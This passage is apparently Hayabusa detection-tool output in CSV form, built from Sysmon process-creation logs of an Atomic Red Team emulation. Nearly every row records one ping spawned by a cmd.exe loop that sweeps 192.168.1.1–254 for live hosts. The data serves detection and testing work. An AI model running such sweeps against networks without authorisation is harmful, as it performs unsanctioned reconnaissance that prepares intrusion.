-n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:15.001 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.201 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:15.518 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.202 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:16.026 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.203 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:16.521 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.204 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:17.037 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.205 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:17.438 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.206 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:18.043 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.207 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: 
""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:18.544 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.208 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:19.012 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.209 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:19.546 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.210 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:20.009 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.211 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 
192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:20.571 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.212 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:21.020 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.213 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:21.520 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.214 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:22.035 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.215 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:22.520 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.216 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:23.011 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.217 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:23.546 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.218 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:23.993 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.219 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:24.504 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.220 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: 
""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:25.008 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.221 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:25.544 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.222 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:26.004 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.223 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:26.430 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.224 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 
192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:27.009 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.225 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:27.555 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.226 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:28.035 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.227 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:28.511 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.228 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:29.009 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.229 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:29.534 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.230 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:30.034 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.231 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:30.521 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.232 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:31.013 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.233 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: 
""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:31.530 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.234 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:32.058 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.235 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:32.614 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.236 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:33.018 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.237 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 
192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:33.548 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.238 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:34.005 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.239 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:34.556 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.240 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:35.024 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.241 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:35.559 
+09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.242 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:36.025 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.243 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:36.536 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.244 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:37.012 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.245 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:37.505 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.246 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: 
""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:38.043 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.247 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:38.588 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.248 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:39.024 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.249 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:39.518 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.250 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 
192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:40.006 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.251 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:40.535 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.252 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:40.982 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.253 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:41.530 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ping -n 1 -w 100 192.168.1.254 : Path: C:\Windows\System32\PING.EXE : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:42.061 
